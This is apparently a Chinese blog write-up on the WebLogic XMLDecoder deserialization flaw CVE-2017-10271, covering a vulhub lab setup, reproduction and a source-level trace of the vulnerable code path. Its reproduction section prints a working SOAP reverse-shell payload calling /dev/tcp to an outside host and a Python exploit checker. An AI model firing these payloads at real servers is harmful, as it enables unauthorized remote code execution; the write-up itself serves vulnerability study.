2. 程式人生 > 其它 >weblogic漏洞分析之CVE-2017-10271

weblogic漏洞分析之CVE-2017-10271

阿新 發佈:2021-08-17

weblogic漏洞分析之CVE-2017-10271

一、環境搭建

1)配置docker

這裡使用vulhub的環境:CVE-2017-10271

  1. 編輯docker-compose.yml檔案,加入8453埠
version: '2'
services:
 weblogic:
   image: vulhub/weblogic:10.3.6.0-2017
   ports:
    - "7001:7001"
    - "8453:8453"
  1. 啟動docker
docker-compose up -d
  1. 進入docker容器中,配置weblogic的遠端除錯
cd /root/Oracle/Middleware/user_projects/domains/base_domain/bin
vi setDomainEnv.sh
  1. 如下圖位置新增兩行程式碼
debugFlag="true"
export debugFlag
  1. 打包modules和wlserver_10.3資料夾並匯出

2)配置idea

  1. 開啟idea,wlserver_10.3資料夾放入專案中
  1. 配置遠端除錯
  1. 再匯入wlserver_10.3\server\lib下的jar包和modules的所有檔案
  1. 打個斷點後訪問漏洞頁面即可看到成功觸發除錯

http://192.168.202.129:7001/wls-wsat/CoordinatorPortType

二、漏洞復現

進入http://192.168.202.129:7001/wls-wsat/CoordinatorPortType,顯示以下頁面即有可能存在漏洞

其他可用url

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

這裡使用bp來進行驗證:

注意此處要指定Content-Type: text/xml,否則會報415錯誤,如以下圖

最後成功訪問test.txt介面http://192.168.202.129:7001/wls-wsat/test.txt

這裡貼上個反彈shell的poc:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.149.139:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 1148

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.149.138/4444 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

驗證python指令碼,注意此指令碼會建立一個test.txt檔案

#!/usr/bin/env python
# coding:utf-8
 
import requests
from sys import argv
 
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Upgrade-Insecure-Requests': '1',
    'Content-Type': 'text/xml'
    }
def Webogic_XMLDecoder_poc(url):
    #url="http://192.168.202.129:7001"
    posturl=url+'/wls-wsat/CoordinatorPortType'
    data = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
                <java version="1.6.0" class="java.beans.XMLDecoder">
                    <object class="java.io.PrintWriter">
                        <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println">
                        <string>xmldecoder_vul_test</string></void><void method="close"/>
                    </object>
                </java>
            </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body/>
    </soapenv:Envelope>
    '''
     
    print url
    try:
        r=requests.post(posturl,data=data,headers=headers,timeout=5)
        geturl=url+"/wls-wsat/test.txt"
        #print geturl
        check_result = requests.get(geturl,headers=headers,timeout=5)
        if 'xmldecoder_vul_test' in check_result.text:
            print u"存在WebLogic WLS遠端執行漏洞(CVE-2017-10271)"
    except:
        pass
 
if __name__ == '__main__':
    if len(argv) == 1:
        print "Please input python Webogic_XMLDecoder_poc.py http://xxxx:7001"
        exit(0)
    else:
        url = argv[1]
    Webogic_XMLDecoder_poc(url)

三、漏洞分析

CVE-2017-10271漏洞主要是由WebLogic Server WLS元件遠端命令執行漏洞,主要由wls-wsat.war觸發該漏洞,觸發漏洞url如下: http://192.168.xx.xx:7001/wls-wsat/CoordinatorPortType post資料包,通過構造構造SOAP(XML)格式的請求,在解析的過程中導致XMLDecoder反序列化漏洞。

weblogic/wsee/jaxws/workcontext/WorkContextServerTube類的processRequest方法中,處理POST資料包中的XML資料。var1即是傳入的xml資料

readHeaderOld方法中,處理讀取的xml

跟進readHeaderOld

前面獲取了xml,使用ByteArrayOutputStream轉換成了位元組流賦值給var4,然後呼叫了WorkContextXmlInputAdapter傳入了var4

跟進WorkContextXmlInputAdapter中,看到其實這就是把var4傳入到XMLDecoder

回到readHeaderOld方法,在前面進行了一些xml的封裝,獲得XMLDecoder物件後,呼叫了113行的receive方法

跟進receive

繼續跟進幾個方法後,到了WorkContextLocalMap#receiveRequest,165行呼叫了WorkContextEntryImplreadEntry方法

跟進WorkContextEntryImpl#readEntry

跟進readUTF,在這裡進行了xmlDecoder.readObject觸發了xmlDecoder的反序列化,執行了ProcessBuilder.start()

執行完這裡就反彈shell成功

這裡其實也就是weblogic中的WLS元件接收到SOAP格式的請求後,未對解析xml後的類,引數等進行處理,一系列傳入最後執行了xmlDecoder.readObject觸發呼叫了類中的方法,產生漏洞。

相關推薦

weblogic漏洞分析CVE-2017-10271

weblogic漏洞分析CVE-2017-10271 一、環境搭建 1)配置docker 這裡使用vulhub的環境:CVE-2017-10271

weblogic漏洞分析CVE-2017-3248 & CVE-2018-2628

CVE-2017-3248 & CVE-2018-2628 後面的漏洞就是2017-3248的繞過而已,所以poc都一樣,只是使用的payload不同

weblogic漏洞分析CVE-2016-0638

weblogic漏洞分析CVE-2016-0638 一、環境搭建: 這裡使用前一篇文章的環境,然後打上補丁

weblogic漏洞分析CVE-2021-2394

weblogic漏洞分析之CVE-2021-2394 簡介 Oracle官方釋出了2021年7月份安全更新通告,通告中披露了WebLogic元件存在高危漏洞,攻擊者可以在未授權的情況下通過IIOP、T3協議對存在漏洞WebLogic Server元件進行攻擊。

Weblogic漏洞分析JNDI注入-CVE-2020-14645

Weblogic漏洞分析JNDI注入-CVE-2020-14645 Oracle七月釋出的安全更新中,包含了一個Weblogic的反序列化RCE漏洞,編號CVE-2020-14645,CVS評分9.8。

weblogic漏洞初探CVE-2015-4852

weblogic漏洞初探CVE-2015-4852 一、環境搭建 1. 搭建docker 這裡用了vulhub的環境進行修改:https://vulhub.org/

【vulhub】Weblogic CVE-2017-10271漏洞復現&&流量分析

Weblogic CVE-2017-10271 漏洞復現&&流量分析 Weblogic CVE-2017-10271 XMLDecoder反序列化

漏洞復現系列】WebLogic XMLDecoder反序列化漏洞CVE-2017-10271

使用vulhub環境: https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271 啟動測試環境:

Weblogic &lt; 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞CVE-2017-10271

Weblogic的WLS Security元件對外提供webservice服務,其中使用了XMLDecoder來解析使用者傳入的XML資料,在解析的過程中出現反序列化漏洞,導致可執行任意命令。

漏洞分析】Struts2-045分析CVE-2017-5638)

struts2 - 045 一個還比較出名的漏洞,因為涉及到利用Gopher協議反彈shell,所以寫篇文章來簡單學習下這個漏洞

weblogic XMLDecoder反序列化 CVE-2017-10271 工具檢測+工具利用復現

被360眾測靶場殘虐,所以決定把這些常規漏洞(Vulhub)都學一下他們的利用。

CVE 2017-10271漏洞復現(寫入webshell)

1.簡介 Weblogic是oracle推出的application server,由於其具有支援EJB、JSP、JMS、XML等多種語言、可擴充套件性、快速開發等多種特性,備受廣大系統管理員的青睞

漏洞程式碼除錯(一):Strtus2-048程式碼分析除錯-(CVE-2017-9791)

​ ​Strtus2-048 一、漏洞描述: ActionMessage 並在客戶前端展示,導致其進入 getText 函式,最後 message 被當作 ognl 表示式執行所以訪問 /integration/saveGangster.action 構造payload。

Jenkins-CI 遠端程式碼執行漏洞復現(CVE-2017-1000353)

0x01 環境 使用vulhub搭建漏洞環境 /vulhub-master/jenkins/CVE-2017-1000353 http://192.168.255.130:8080/

CVE-2017-10271

家部落格沒有備案,暫時炸掉了,暫時在部落格園記錄 CVE-2017-10271漏洞是由weblogic server WSL元件造成遠端命令執行。

漏洞分析CVE 2021-3156

漏洞分析CVE 2021-3156 漏洞簡述 漏洞名稱:sudo堆溢位本地提權 漏洞編號:CVE-2021-3156

漏洞預警 | Apache Struts2 曝任意程式碼執行漏洞 (S2-045,CVE-2017-5638)

FreeBuf上次曝Struts 2的漏洞已經是半年多以前的事情了。 這次的漏洞又是個RCE遠端程式碼執行漏洞。簡單來說,基於Jakarta Multipart解析器進行檔案上傳時,利用漏洞可進行遠端程式碼執行。該漏洞由安恆資訊Nike Zhe

Tomcat PUT高危漏洞CVE-2017-12615)復現與分析

一、漏洞復現: BurpSuite抓包,傳送一個PUT的請求,資料包為冰蠍的馬 如果存在該漏洞,Response的狀態碼為201

weblogic CVE-2020-2963、CNVD-2020-23019 反序列化漏洞分析與復現

簡介 這兩個洞應該都是5月更新的補丁,分析時候無意中發現的。看了一下漏洞挺簡單,就是利用有點苛刻

CVE-2017-17215 華為路由器漏洞分析

環境搭建 韌體連結:https://ia601506.us.archive.org/22/items/RouterHG532e/router HG532e.rar qemu 配置: